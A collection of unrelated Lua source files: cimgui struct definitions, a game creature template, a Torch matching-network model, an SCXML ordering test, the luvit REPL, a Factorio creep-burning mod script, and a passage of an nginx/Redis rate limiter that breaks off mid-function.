defs["structs"]["ImGuiStyle"][25]["name"] = "LogSliderDeadzone"
defs["structs"]["ImGuiStyle"][25]["type"] = "float"
defs["structs"]["ImGuiStyle"][26] = {}
defs["structs"]["ImGuiStyle"][26]["name"] = "TabRounding"
defs["structs"]["ImGuiStyle"][26]["type"] = "float"
defs["structs"]["ImGuiStyle"][27] = {}
defs["structs"]["ImGuiStyle"][27]["name"] = "TabBorderSize"
defs["structs"]["ImGuiStyle"][27]["type"] = "float"
defs["structs"]["ImGuiStyle"][28] = {}
defs["structs"]["ImGuiStyle"][28]["name"] = "TabMinWidthForCloseButton"
defs["structs"]["ImGuiStyle"][28]["type"] = "float"
defs["structs"]["ImGuiStyle"][29] = {}
defs["structs"]["ImGuiStyle"][29]["name"] = "ColorButtonPosition"
defs["structs"]["ImGuiStyle"][29]["type"] = "ImGuiDir"
defs["structs"]["ImGuiStyle"][30] = {}
defs["structs"]["ImGuiStyle"][30]["name"] = "ButtonTextAlign"
defs["structs"]["ImGuiStyle"][30]["type"] = "ImVec2"
defs["structs"]["ImGuiStyle"][31] = {}
defs["structs"]["ImGuiStyle"][31]["name"] = "SelectableTextAlign"
defs["structs"]["ImGuiStyle"][31]["type"] = "ImVec2"
defs["structs"]["ImGuiStyle"][32] = {}
defs["structs"]["ImGuiStyle"][32]["name"] = "DisplayWindowPadding"
defs["structs"]["ImGuiStyle"][32]["type"] = "ImVec2"
defs["structs"]["ImGuiStyle"][33] = {}
defs["structs"]["ImGuiStyle"][33]["name"] = "DisplaySafeAreaPadding"
defs["structs"]["ImGuiStyle"][33]["type"] = "ImVec2"
defs["structs"]["ImGuiStyle"][34] = {}
defs["structs"]["ImGuiStyle"][34]["name"] = "MouseCursorScale"
defs["structs"]["ImGuiStyle"][34]["type"] = "float"
defs["structs"]["ImGuiStyle"][35] = {}
defs["structs"]["ImGuiStyle"][35]["name"] = "AntiAliasedLines"
defs["structs"]["ImGuiStyle"][35]["type"] = "bool"
defs["structs"]["ImGuiStyle"][36] = {}
defs["structs"]["ImGuiStyle"][36]["name"] = "AntiAliasedLinesUseTex"
defs["structs"]["ImGuiStyle"][36]["type"] = "bool"
defs["structs"]["ImGuiStyle"][37] = {}
defs["structs"]["ImGuiStyle"][37]["name"] = "AntiAliasedFill"
defs["structs"]["ImGuiStyle"][37]["type"] = "bool"
defs["structs"]["ImGuiStyle"][38] = {}
defs["structs"]["ImGuiStyle"][38]["name"] = "CurveTessellationTol"
defs["structs"]["ImGuiStyle"][38]["type"] = "float"
defs["structs"]["ImGuiStyle"][39] = {}
defs["structs"]["ImGuiStyle"][39]["name"] = "CircleTessellationMaxError"
defs["structs"]["ImGuiStyle"][39]["type"] = "float"
defs["structs"]["ImGuiStyle"][40] = {}
defs["structs"]["ImGuiStyle"][40]["name"] = "Colors[ImGuiCol_COUNT]"
defs["structs"]["ImGuiStyle"][40]["size"] = 53
defs["structs"]["ImGuiStyle"][40]["type"] = "ImVec4"
defs["structs"]["ImGuiTableColumnSortSpecs"] = {}
defs["structs"]["ImGuiTableColumnSortSpecs"][1] = {}
defs["structs"]["ImGuiTableColumnSortSpecs"][1]["name"] = "ColumnUserID"
defs["structs"]["ImGuiTableColumnSortSpecs"][1]["type"] = "ImGuiID"
defs["structs"]["ImGuiTableColumnSortSpecs"][2] = {}
defs["structs"]["ImGuiTableColumnSortSpecs"][2]["name"] = "ColumnIndex"
defs["structs"]["ImGuiTableColumnSortSpecs"][2]["type"] = "ImS16"
defs["structs"]["ImGuiTableColumnSortSpecs"][3] = {}
defs["structs"]["ImGuiTableColumnSortSpecs"][3]["name"] = "SortOrder"
defs["structs"]["ImGuiTableColumnSortSpecs"][3]["type"] = "ImS16"
defs["structs"]["ImGuiTableColumnSortSpecs"][4] = {}
defs["structs"]["ImGuiTableColumnSortSpecs"][4]["bitfield"] = "8"
defs["structs"]["ImGuiTableColumnSortSpecs"][4]["name"] = "SortDirection"
defs["structs"]["ImGuiTableColumnSortSpecs"][4]["type"] = "ImGuiSortDirection"
defs["structs"]["ImGuiTableSortSpecs"] = {}
defs["structs"]["ImGuiTableSortSpecs"][1] = {}
defs["structs"]["ImGuiTableSortSpecs"][1]["name"] = "Specs"
defs["structs"]["ImGuiTableSortSpecs"][1]["type"] = "const ImGuiTableColumnSortSpecs*"
defs["structs"]["ImGuiTableSortSpecs"][2] = {}
defs["structs"]["ImGuiTableSortSpecs"][2]["name"] = "SpecsCount"
defs["structs"]["ImGuiTableSortSpecs"][2]["type"] = "int"
defs["structs"]["ImGuiTableSortSpecs"][3] = {}
defs["structs"]["ImGuiTableSortSpecs"][3]["name"] = "SpecsDirty"
defs["structs"]["ImGuiTableSortSpecs"][3]["type"] = "bool"
defs["structs"]["ImGuiTextBuffer"] = {}
defs["structs"]["ImGuiTextBuffer"][1] = {}
defs["structs"]["ImGuiTextBuffer"][1]["name"] = "Buf"
defs["structs"]["ImGuiTextBuffer"][1]["template_type"] = "char"
defs["structs"]["ImGuiTextBuffer"][1]["type"] = "ImVector_char"
defs["structs"]["ImGuiTextFilter"] = {}
defs["structs"]["ImGuiTextFilter"][1] = {}
defs["structs"]["ImGuiTextFilter"][1]["name"] = "InputBuf[256]"
defs["structs"]["ImGuiTextFilter"][1]["size"] = 256
defs["structs"]["ImGuiTextFilter"][1]["type"] = "char"
defs["structs"]["ImGuiTextFilter"][2] = {}
defs["structs"]["ImGuiTextFilter"][2]["name"] = "Filters"
defs["structs"]["ImGuiTextFilter"][2]["template_type"] = "ImGuiTextRange"
defs["structs"]["ImGuiTextFilter"][2]["type"] = "ImVector_ImGuiTextRange"
defs["structs"]["ImGuiTextFilter"][3] = {}
defs["structs"]["ImGuiTextFilter"][3]["name"] = "CountGrep"
defs["structs"]["ImGuiTextFilter"][3]["type"] = "int"
defs["structs"]["ImGuiTextRange"] = {}
defs["structs"]["ImGuiTextRange"][1] = {}
defs["structs"]["ImGuiTextRange"][1]["name"] = "b"
defs["structs"]["ImGuiTextRange"][1]["type"] = "const char*"
defs["structs"]["ImGuiTextRange"][2] = {}
defs["structs"]["ImGuiTextRange"][2]["name"] = "e"
defs["structs"]["ImGuiTextRange"][2]["type"] = "const char*"
defs["structs"]["ImGuiViewport"] = {}
defs["structs"]["ImGuiViewport"][1] = {}
defs["structs"]["ImGuiViewport"][1]["name"] = "Flags"
defs["structs"]["ImGuiViewport"][1]["type"] = "ImGuiViewportFlags"
defs["structs"]["ImGuiViewport"][2] = {}
defs["structs"]["ImGuiViewport"][2]["name"] = "Pos"
defs["structs"]["ImGuiViewport"][2]["type"] = "ImVec2"
defs["structs"]["ImGuiViewport"][3] = {}
defs["structs"]["ImGuiViewport"][3]["name"] = "Size"
defs["structs"]["ImGuiViewport"][3]["type"] = "ImVec2"
defs["structs"]["ImGuiViewport"][4] = {}
defs["structs"]["ImGuiViewport"][4]["name"] = "WorkPos"
defs["structs"]["ImGuiViewport"][4]["type"] = "ImVec2"
defs["structs"]["ImGuiViewport"][5] = {}
defs["structs"]["ImGuiViewport"][5]["name"] = "WorkSize"
defs["structs"]["ImGuiViewport"][5]["type"] = "ImVec2"
defs["structs"]["ImVec2"] = {}
defs["structs"]["ImVec2"][1] = {}
defs["structs"]["ImVec2"][1]["name"] = "x"
defs["structs"]["ImVec2"][1]["type"] = "float"
defs["structs"]["ImVec2"][2] = {}
defs["structs"]["ImVec2"][2]["name"] = "y"
defs["structs"]["ImVec2"][2]["type"] = "float"
defs["structs"]["ImVec4"] = {}
defs["structs"]["ImVec4"][1] = {}
defs["structs"]["ImVec4"][1]["name"] = "x"
defs["structs"]["ImVec4"][1]["type"] = "float"
defs["structs"]["ImVec4"][2] = {}
defs["structs"]["ImVec4"][2]["name"] = "y"
defs["structs"]["ImVec4"][2]["type"] = "float"
defs["structs"]["ImVec4"][3] = {}
defs["structs"]["ImVec4"][3]["name"] = "z"
defs["structs"]["ImVec4"][3]["type"] = "float"
defs["structs"]["ImVec4"][4] = {}
defs["structs"]["ImVec4"][4]["name"] = "w"
defs["structs"]["ImVec4"][4]["type"] = "float"
return defs |
prowling_gurreck = Creature:new {
objectName = "@mob/creature_names:gurreck_prowler",
socialGroup = "gurreck",
faction = "",
level = 45,
chanceHit = 0.44,
damageMin = 365,
damageMax = 440,
baseXp = 4370,
baseHAM = 8900,
baseHAMmax = 10900,
armor = 0,
resists = {165,165,30,30,-1,30,30,30,-1},
meatType = "meat_carnivore",
meatAmount = 75,
hideType = "hide_wooly",
hideAmount = 45,
boneType = "",
boneAmount = 0,
milk = 0,
tamingChance = 0.25,
ferocity = 0,
pvpBitmask = AGGRESSIVE + ATTACKABLE + ENEMY,
creatureBitmask = PACK + STALKER,
optionsBitmask = AIENABLED,
diet = CARNIVORE,
templates = {"object/mobile/gurreck_hue.iff"},
controlDeviceTemplate = "object/intangible/pet/gurreck_hue.iff",
scale = 1.1,
lootGroups = {},
weapons = {},
conversationTemplate = "",
attacks = {
{"blindattack",""},
{"posturedownattack",""}
}
}
CreatureTemplates:addCreatureTemplate(prowling_gurreck, "prowling_gurreck")
|
local t = require 'torch'
local autograd = require 'autograd'
local util = require 'util.util'
return function(opt)
local model = {}
local maxGradNorm = opt.maxGradNorm or 0.25
-- load and functionalize embedding nets
local model1 = require(opt.learner)({
nClasses=opt.nClasses.train, useCUDA=opt.useCUDA, classify=false,
nIn=opt.nIn, nDepth=opt.nDepth, useDropout=opt.useDropout
})
local embedNet1 = model1.net
local model2 = require(opt.learner)({
nClasses=opt.nClasses.train, useCUDA=opt.useCUDA, classify=false,
nIn=opt.nIn, nDepth=opt.nDepth, useDropout=opt.useDropout
})
local embedNet2 = model2.net
local modelF, paramsF = autograd.functionalize(embedNet1)
local modelG, paramsG = autograd.functionalize(embedNet2)
local attLSTM, paramsAttLSTM, layers =
require('model.lstm.RecurrentLSTMNetwork')({
inputFeatures = model1.outSize + model2.outSize,
hiddenFeatures = model1.outSize,
outputType = 'all'
})
local biLSTMForward, paramsBiLSTMForward, layers =
require('model.lstm.RecurrentLSTMNetwork')({
inputFeatures = model2.outSize,
hiddenFeatures = model2.outSize,
outputType = 'all'
})
local biLSTMBackward, paramsBiLSTMBackward, layers =
require('model.lstm.RecurrentLSTMNetwork')({
inputFeatures = model2.outSize,
hiddenFeatures = model2.outSize,
outputType = 'all'
})
local softmax = autograd.functionalize(nn.SoftMax(true))
model.params = {
f=paramsG,
g=paramsG,
biLSTMForward=paramsBiLSTMForward,
biLSTMBackward=paramsBiLSTMBackward,
attLSTM=paramsAttLSTM
}
-- set training or evaluate mode
model.set = function(mode)
if mode == 'training' then
modelF.module:training()
modelG.module:training()
elseif mode == 'evaluate' then
modelF.module:evaluate()
modelG.module:evaluate()
else
error(string.format("model.set: undefined mode - %s", mode))
end
end
model.attLSTM = function(params, input, K)
local gS = input[1]
local fX = input[2]
local h = {}
local c = {}
local r = {}
r[1] = t.expandAs(t.mean(gS,1), fX)
for i=1,K do
local x = t.cat(fX, r[i], 2)
local tempH, state = attLSTM(params, t.view(x, t.size(x,1), 1,
t.size(x,2)), {h=h[i-1], c=c[i-1]})
h[i] = fX + t.view(tempH, t.size(tempH, 1), t.size(tempH, 3))
c[i] = state.c
local batchR = {}
for j=1,t.size(h[i], 1) do
local hInd = h[i][j]
local weight = t.sum(t.cmul(gS, t.expandAs(
t.reshape(hInd, 1, hInd:size(1)), gS)), 2)
local embed = t.sum(t.cmul(t.expandAs(softmax(weight), gS), gS), 1)
batchR[j] = embed
end
r[i+1] = t.cat(batchR, 1)
end
return h[#h]
end
model.biLSTM = function(params, input)
local gX = input
local fH = {}
local stateF = {}
local bH = {}
local stateB = {}
local gS = {}
local size = t.size(gX,1)
for i=1,size do
local tempHF, tempStateF = biLSTMForward(params[1],
t.index(gX, 1, t.LongTensor{i}), stateF[i-1])
fH[i] = tempHF
stateF[i] = tempStateF
local tempHB, tempStateB = biLSTMBackward(params[2],
t.index(gX, 1, t.LongTensor{size-(i-1)}), stateB[i-1])
bH[i] = tempHB
stateB[i] = tempStateB
end
for i=1,size do
gS[i] = t.index(gX, 1, t.LongTensor{i}) + fH[i] + bH[i]
end
return torch.cat(gS, 1)
end
model.embedS = function(params, input)
local g = modelG(params.g, input)
return model.biLSTM({params.biLSTMForward, params.biLSTMBackward}, g)
end
model.embedX = function(params, input, g, K)
local f = modelF(params.f, input)
return model.attLSTM(params.attLSTM, {g, f}, K)
end
model.df = function(dfDefault)
return function(params, input, testY)
local grads, loss, pred = dfDefault(params, input, testY)
local norm = 0
for i,grad in ipairs(autograd.util.sortedFlatten(grads.attLSTM)) do
norm = norm + torch.sum(torch.pow(grad,2))
end
norm = math.sqrt(norm)
if norm > maxGradNorm then
for i,grad in ipairs(autograd.util.sortedFlatten(grads.attLSTM)) do
grad:mul( maxGradNorm / norm )
end
end
local norm = 0
for i,grad in ipairs(autograd.util.sortedFlatten(grads.biLSTM)) do
norm = norm + torch.sum(torch.pow(grad,2))
end
norm = math.sqrt(norm)
if norm > maxGradNorm then
for i,grad in ipairs(autograd.util.sortedFlatten(grads.biLSTM)) do
grad:mul( maxGradNorm / norm )
end
end
return grads, loss, pred
end
end
model.save = function()
local models = {modelF=embedNet1:clearState(), modelG=embedNet2:clearState()}
torch.save('matching-net-models.th', models)
end
model.load = function(networkFile, opt)
local data = torch.load(networkFile)
modelF, _ = autograd.functionalize(util.localize(data.modelF, opt))
modelG, _ = autograd.functionalize(util.localize(data.modelG, opt))
end
return model
end
|
require("moonsc").import_tags()
-- Test that states are entered in entry order (parents before children
-- with document order used to break ties) after the executable content
-- in the transition is executed.
-- event1, event2, event3, event4 should be raised in that order when the
-- transition in s01 is taken
return _scxml{ initial="s0",
_state{ id="s0", initial="s01",
_onentry{ _send{ event="timeout", delay="1s" }},
_transition{ event="timeout", target="fail" },
_state{ id="s01",
-- this should be the first event raised
_transition{ target="s0p2", _raise{ event="event1" }},
},
_parallel{ id="s0p2",
_transition{ event="event1", target="s03" },
_state{ id="s01p21",
_onentry{ _raise{ event="event3" }}, -- third event
},
_state{ id="s01p22",
_onentry{ _raise{ event="event4" }}, -- the fourth event
},
_onentry{ _raise{ event="event2" }}, -- this should be the second event raised
},
_state{ id="s03",
_transition{ event="event2", target="s04" },
_transition{ event="*", target="fail" },
},
_state{ id="s04",
_transition{ event="event3", target="s05" },
_transition{ event="*", target="fail" },
},
_state{ id="s05",
_transition{ event="event4", target="pass" },
_transition{ event="*", target="fail" },
},
}, -- end s0
_final{id='pass'},
_final{id='fail'},
}
|
--[[
Copyright 2014-2015 The Luvit Authors. All Rights Reserved.
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS-IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
--]]
--[[lit-meta
name = "luvit/repl"
version = "2.0.2"
dependencies = {
"luvit/utils@2.0.0",
"luvit/readline@2.0.0",
}
license = "Apache 2"
homepage = "https://github.com/luvit/luvit/blob/master/deps/repl.lua"
description = "Advanced auto-completing repl for luvit lua."
tags = {"luvit", "tty", "repl"}
]]
local uv = require('uv')
local utils = require('utils')
local pathJoin = require('luvi').path.join
local Editor = require('readline').Editor
local History = require('readline').History
local _builtinLibs = { 'buffer', 'childprocess', 'codec', 'core',
'dgram', 'dns', 'fs', 'helpful', 'hooks', 'http-codec', 'http',
'https', 'json', 'los', 'net', 'pretty-print',
'querystring', 'readline', 'timer', 'url', 'utils',
'stream', 'tls', 'path'
}
return function (stdin, stdout, greeting)
local req, mod = require('require')(pathJoin(uv.cwd(), "repl"))
local oldGlobal = _G
local global = setmetatable({
require = req,
module = mod,
}, {
__index = function (_, key)
if key == "thread" then return coroutine.running() end
return oldGlobal[key]
end
})
if greeting then stdout:write(greeting .. '\n') end
local c = utils.color
local function gatherResults(success, ...)
local n = select('#', ...)
return success, { n = n, ... }
end
local function printResults(results)
for i = 1, results.n do
results[i] = utils.dump(results[i])
end
stdout:write(table.concat(results, '\t') .. '\n')
end
local buffer = ''
local function evaluateLine(line)
if line == "<3" or line == "♥" then
stdout:write("I " .. c("err") .. "♥" .. c() .. " you too!\n")
return '>'
end
local chunk = buffer .. line
local f, err = loadstring('return ' .. chunk, 'REPL') -- first we prefix return
if not f then
f, err = loadstring(chunk, 'REPL') -- try again without return
end
if f then
setfenv(f, global)
buffer = ''
local success, results = gatherResults(xpcall(f, debug.traceback))
if success then
-- successful call
if results.n > 0 then
printResults(results)
end
elseif type(results[1]) == 'string' then
-- error
stdout:write(results[1] .. '\n')
else
-- error calls with non-string message objects will pass through debug.traceback without a stacktrace added
stdout:write('error with unexpected error message type (' .. type(results[1]) .. '), no stacktrace available\n')
end
else
if err:match "'<eof>'$" then
-- Lua expects some more input; stow it away for next time
buffer = chunk .. '\n'
return '>> '
else
stdout:write(err .. '\n')
buffer = ''
end
end
return '> '
end
local function completionCallback(line)
local base, sep, rest = string.match(line, "^(.*)([.:])(.*)")
if not base then
rest = line
end
local prefix = string.match(rest, "^[%a_][%a%d_]*")
if prefix and prefix ~= rest then return end
local scope
if base then
local f = loadstring("return " .. base)
setfenv(f, global)
scope = f()
else
base = ''
sep = ''
scope = global
end
local matches = {}
local prop = sep ~= ':'
while type(scope) == "table" do
for key, value in pairs(scope) do
if (prop or (type(value) == "function")) and
((not prefix) or (string.match(key, "^" .. prefix))) then
matches[key] = true
end
end
scope = getmetatable(scope)
scope = scope and scope.__index
end
local items = {}
for key in pairs(matches) do
items[#items + 1] = key
end
table.sort(items)
if #items == 1 then
return base .. sep .. items[1]
elseif #items > 1 then
return items
end
end
local function start(historyLines, onSaveHistoryLines)
local prompt = "> "
local history = History.new()
if historyLines then
history:load(historyLines)
end
local editor = Editor.new({
stdin = stdin,
stdout = stdout,
completionCallback = completionCallback,
history = history
})
local function onLine(err, line)
assert(not err, err)
coroutine.wrap(function ()
if line then
prompt = evaluateLine(line)
editor:readLine(prompt, onLine)
-- TODO: break out of >> with control+C
elseif onSaveHistoryLines then
onSaveHistoryLines(history:dump())
end
end)()
end
editor:readLine(prompt, onLine)
-- Namespace builtin libs to make the repl easier to play with
-- Requires with filenames with a - in them will be camelcased
-- e.g. pretty-print -> prettyPrint
table.foreach(_builtinLibs, function(_, lib)
local requireName = lib:gsub('-.', function (char) return char:sub(2):upper() end)
local req = string.format('%s = require("%s")', requireName, lib)
evaluateLine(req)
end)
end
return {
start = start,
evaluateLine = evaluateLine,
}
end
|
-- TODO: See about spreading from trees. Unfortunately, an event doesn't
-- TODO: trigger when trees are damaged by fire, unlike other entities.
-- TODO: Will probably need to modify prototype to create_entity
-- TODO: See about nuclear bombs and other "fire" sources lighting
-- TODO: creep on fire. Or maybe just remove creep in its path.
-- TODO: Start a slow re-growth of grasses where the creep burned
-- TODO: Auto-target creep with flame turrets
local util = require "utils"
local CREEPER_FLAMES = {
"creeper-flame-1",
"creeper-flame-2",
"creeper-flame-3",
"creeper-flame-4",
}
local CREEPER_TILE = "creeper-landfill"
local FLAME_NTH_TICKS = 19
-- XXX: Are both needed? Is the initial vs. post delta noticeable?
local SPREAD_DELAY = { 300, 180 }
local SPREAD_N_DELAY = { 240, 240 }
local SPREAD_LIMIT = { 100, 1000 }
-- Cached setting values.
local burnination = true
local wildfires = false
-- Local binds.
local math_random = math.random
local filter_tile = util.filter_tile
local filter_surface = util.filter_surface
local position_key = util.position_key
local FlameEntity = function (entity)
local flame = {}
setmetatable (flame, { __index = entity })
flame.index = position_key (entity)
return flame
end
local filter_flame = function (entity)
if not (entity and entity.valid) then return nil end
if not filter_surface (entity.surface, true) then return nil end
if entity.type ~= "fire" then return nil end
return FlameEntity (entity)
end
local when_spread = function (whence, how)
local parts
local coeffecient = 1
if how then
parts = SPREAD_N_DELAY
else
parts = SPREAD_DELAY
end
return whence + math_random (parts[1], parts[1] + parts[2])
end
local on_trigger_created_entity = function (event)
if not burnination then return end
local flame = filter_flame (event.entity)
if not flame then return end
local surface = flame.surface
local tile = filter_tile (surface.get_tile (flame.position))
if tile and (tile.name == "kr-creep" or tile.name == "fk-creep") then
surface.set_tiles ({
{ name = CREEPER_TILE, position = tile.position }
})
local force = flame.force
-- XXX: This doesn't work. It's as if the effect is
-- XXX: something else, but I cannot "find" it to remove it.
flame.destroy()
-- Replace it with ours since it is on creep.
local entity = surface.create_entity {
name = CREEPER_FLAMES[1],
position = tile.position,
force = force
}
local new_flame = FlameEntity (entity)
local flame_info = {
create_tick = event.tick,
flame = new_flame,
seed_index = new_flame.index,
spawned_flames = 0,
spread_tick = when_spread (event.tick)
}
global.active_flames[new_flame.index] = flame_info
util.insert_keyed_table (
global.by_tick, flame_info.spread_tick, new_flame.index
)
local coefficient = 1
if wildfires then
coefficient = 10
end
global.spread_limits[new_flame.index] = math_random (
SPREAD_LIMIT[1],
SPREAD_LIMIT[2] * coefficient
)
end
end
local spread_flame = function (tick, flame_info, flame_count)
-- REQUIRES: valid flame/surface
-- Bind locally.
local table_insert = table.insert
local surface = flame_info.flame.surface
local surface_create_entity = surface.create_entity
local surrounding_creep = surface.find_tiles_filtered {
name = {"kr-creep", "fk-creep"},
position = flame_info.flame.position,
radius = 2.5
}
local found_creep = table_size (surrounding_creep)
local seed_index = flame_info.seed_index
flame_count = math.min (found_creep, flame_count)
local new_flames = {}
local random_offset = math_random (0, found_creep)
while flame_count > 0 do
local tile_index = (flame_count + random_offset) % found_creep + 1
local position = surrounding_creep[tile_index].position
position.x = position.x + math_random() / 2
position.y = position.y + math_random() / 2
local entity = surface_create_entity {
name = CREEPER_FLAMES[math_random (2, 4)],
position = position,
force = flame_info.flame.force
}
if entity then
local flame = FlameEntity (entity)
local how = flame_info.spawned_flames > 0
table_insert (new_flames, {
create_tick = tick,
flame = flame,
seed_index = seed_index,
spawned_flames = 0,
spread_tick = when_spread (tick, how)
})
flame_info.spawned_flames = flame_info.spawned_flames + 1
end
flame_count = flame_count - 1
end
return new_flames, found_creep - table_size (new_flames)
end
local on_flame_nth_tick = function (event)
if not burnination then return end
-- Bind locally.
local table_insert = table.insert
local active_flames = global.active_flames
local by_tick = global.by_tick
local spread_limits = global.spread_limits
-- Table that contains tables of new flames that were generated.
local new_flames = {}
local tick = event.tick
for t = tick - FLAME_NTH_TICKS + 1, tick do
local now_flame_indices = by_tick[t] or {}
for _, index in pairs (now_flame_indices) do
local flame_info = active_flames[index]
if not flame_info then goto continue end
local flame = flame_info.flame
local spread_limit = spread_limits[flame_info.seed_index]
if not spread_limit or spread_limit <= 0 then
active_flames[index] = nil
spread_limits[flame_info.seed_index] = nil
elseif not filter_flame (flame) then
active_flames[index] = nil
else
local spread_count = 1
if wildfires then
spread_count = 2
end
local flames, remaining_tiles = spread_flame (
tick,
flame_info,
spread_count
)
flame_info.spread_tick = when_spread (tick, true)
util.insert_keyed_table (
by_tick,
flame_info.spread_tick,
flame_info.flame.index
)
if flames then
table_insert (new_flames, flames)
local remaining = spread_limit - table_size (flames)
spread_limits[flame_info.seed_index] = remaining
end
if remaining_tiles == 0 then
-- No need to monitor this. We still need the
-- `spread_limits` if this was the original flame.
active_flames[index] = nil
end
end
::continue::
end
-- All of these for this tick has been processed.
by_tick[t] = nil
end
-- Finalize all the spread flames, killing off the creep, and
-- setting them up in the global tables.
local replacement_by_surface = {}
for _, flames in pairs (new_flames) do
for _, flame_info in pairs (flames) do
local flame = flame_info.flame
local surface_index = flame.surface.index
local landfill = { name = CREEPER_TILE, position = flame.position }
util.insert_keyed_table (
replacement_by_surface,
surface_index,
landfill
)
active_flames[flame.index] = flame_info
util.insert_keyed_table (
by_tick, flame_info.spread_tick, flame.index
)
end
end
-- Nothing left to monitor.
if table_size (active_flames) == 0 then
global.spread_limits = {}
end
for surface_index, landscape_tiles in pairs (replacement_by_surface) do
local surface = game.surfaces[surface_index]
if surface and surface.valid then
surface.set_tiles (landscape_tiles)
end
end
end
local on_runtime_settings = function (event)
if event.setting_type == "runtime-global" then
if event.setting == "creep-destroyed-by-fire" then
burnination = settings.global[event.setting].value
elseif event.setting == "creep-wildfires" then
wildfires = settings.global[event.setting].value
end
end
end
local lib = {}
lib.events = {
[defines.events.on_runtime_mod_setting_changed] = on_runtime_settings,
[defines.events.on_trigger_created_entity] = on_trigger_created_entity,
}
lib.on_nth_tick = {
[FLAME_NTH_TICKS] = on_flame_nth_tick,
}
local cache_settings = function()
burnination = settings.global["creep-destroyed-by-fire"].value
wildfires = settings.global["creep-wildfires"].value
end
-- Called on new game.
-- Called when added to exiting game.
lib.on_init = function()
cache_settings()
global.active_flames = {}
global.by_tick = {}
-- Indexed by the seed flame index. Used to track how many more
-- flames can be spawned by it and its descendants.
global.spread_limits = {}
end
-- Not called when added to existing game.
-- Called when loaded after saved in existing game.
lib.on_load = function()
cache_settings()
end
-- Not called on new game.
-- Called when added to existing game.
lib.on_configuration_changed = function (config)
local modname = util.modname
local creeper
if config and config.mod_changes then
creeper = config.mod_changes[modname]
end
if creeper then
local old_version = creeper.old_version or "0.0.0"
local new_version = creeper.new_version or "0.0.0"
print (string.format (
"%s (fire): %s -> %s",
modname, old_version, new_version
))
if new_version == "1.0.3" then
cache_settings()
global.active_flames = {}
global.by_tick = {}
global.spread_limits = {}
end
end
end
return lib |
-- Copyright [2018] [Dominic Tootell]
-- Licensed under the Apache License, Version 2.0 (the "License");
-- you may not use this file except in compliance with the License.
-- You may obtain a copy of the License at
-- http://www.apache.org/licenses/LICENSE-2.0
-- Unless required by applicable law or agreed to in writing, software
-- distributed under the License is distributed on an "AS IS" BASIS,
-- WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-- See the License for the specific language governing permissions and
-- limitations under the License.
local redis = require "resty.redis"
local ngx = require "ngx"
local type = type
local assert = assert
local floor = math.floor
local tonumber = tonumber
local null = ngx.null
local shared_dict_default = 'ratelimit_circuit_breaker'
local redis_host_default = '127.0.0.1'
local redis_port_default = 6379
local redis_timeout_default = 300
local redis_dbid_default = nil
local FAILED_TO_RETURN_CONNECTION = "failed_returning_connection_to_pool"
local FAILED_TO_SET_KEY_EXPIRY = "failed_set_key_expiry"
local _M = {
_VERSION = "0.0.1",
}
local mt = {
__index = _M
}
local function is_str(s)
return type(s) == "string"
end
local function _defaults(cfg,window_size_in_seconds)
if cfg['host'] == nil then
cfg['host'] = redis_host_default
end
if cfg['port'] == nil then
cfg['port'] = redis_port_default
end
if cfg['timeout'] == nil then
cfg['timeout'] = redis_timeout_default
end
if cfg['dbid'] == nil then
cfg['dbid'] = redis_dbid_default
end
if cfg['idle_keepalive_ms'] == nil then
cfg['idle_keepalive_ms'] = 10000
end
if cfg['connection_pool_size'] == nil then
cfg['connection_pool_size'] = 100
end
if cfg['expire_after_seconds'] == nil then
cfg['expire_after_seconds'] = window_size_in_seconds * 5
end
if cfg['circuit_breaker_dict_name'] == nil then
cfg['circuit_breaker_dict_name'] = shared_dict_default
end
if cfg['background'] == nil then
cfg['background'] = true
end
end
-- local lim, err = class.new(zone, rate, burst, duration)
function _M.new(zone, rate, cfg)
local zone = zone or "ratelimit"
local rate = rate or "1r/s"
if type(cfg) ~= "table" then
cfg = {}
end
local scale = 1
local len = #rate
if len>3 then
-- check for requests per minute.
-- default is requests per second
local rate_type = rate:sub(len - 2)
rate = rate:sub(1, len - 3)
if rate_type == "r/m" then
scale = 60
end
else
rate = 1
end
rate = tonumber(rate)
_defaults(cfg,scale)
assert(rate > 0 and scale >= 0, 'Invalid rate limit, supported are r/s, r/m, given:'.. rate)
assert(cfg['expire_after_seconds'] >= (scale * 3),"Invalid Expire time for keys for 'expire_after_seconds'")
return setmetatable({
zone = zone,
rate = rate,
scale = scale,
circuit_breaker_dict_name = cfg['circuit_breaker_dict_name'],
cfg = cfg,
}, mt)
end
local function _redis_create(host, port, timeout_millis, dbid)
local red = redis:new()
if red == nil then
return nil, redis_err("unable to create redis object")
end
red:set_timeout(timeout_millis)
local redis_err = function(err)
local msg = "failed to create redis"
if is_str(err) then
msg = msg .. " - " .. err
end
return msg
end
local ok, err = red:connect(host, port)
if not ok then
return nil, redis_err(err)
end
if dbid then
local ok, err = red:select(dbid)
if not ok then
return nil, redis_err(err)
end
end
return red
end
--
-- Returns the current key and the previous key
-- based on the current nginx request time, and the scale.
-- key is <zone:key>_<epoch for period>
--
local function get_keys(scale, key, start_of_period)
return string.format("%s_%d",key,start_of_period),string.format("%s_%d",key,start_of_period-scale)
end
-- When rate limiting is in effect for a client
-- an entry in the shared dict will be present for that
-- key.
--
-- when the circuit is close (requests flowing normally) true is returned
-- when rate limiting is in effect, the circuit is open, false is returned
local function circuit_is_closed(dict_name,key)
local dict = ngx.shared[dict_name]
if dict ~= nil then
local limited = dict:get(key)
if limited ~= nil then
return false
end
end
return true
end
local function open_circuit(dict_name,key,expiry)
local dict = ngx.shared[dict_name]
if dict ~= nil then
dict:add(key,1,expiry)
end
end
local function get_start_of_period(scale,requesttime)
local seconds = math.floor(requesttime)
if scale == 60 then
-- It is requests per min
local minute = seconds - seconds%60
return minute
end
return seconds
end
local function expire(premature, key,scale,cfg)
local not_expired = true
local expire_tries = 0
local last_err = nil
local retry = true
while retry do
expire_tries=expire_tries+1
local red_exp, last_err = _redis_create(cfg.host,cfg.port,
cfg.timeout,cfg.dbid)
if red_exp ~= nil then
local res, last_err = red_exp:expire(key,cfg.expire_after_seconds)
if last_err == nil then
not_expired = false
retry = false
local ok, err = red_exp:set_keepalive(cfg.idle_keepalive_ms, cfg.connection_pool_size)
if not ok then
ngx.log(ngx.WARN,'|{"level" : "WARN", "msg" : "' .. FAILED_TO_RETURN_CONNECTION .. '"}|', err)
end
else
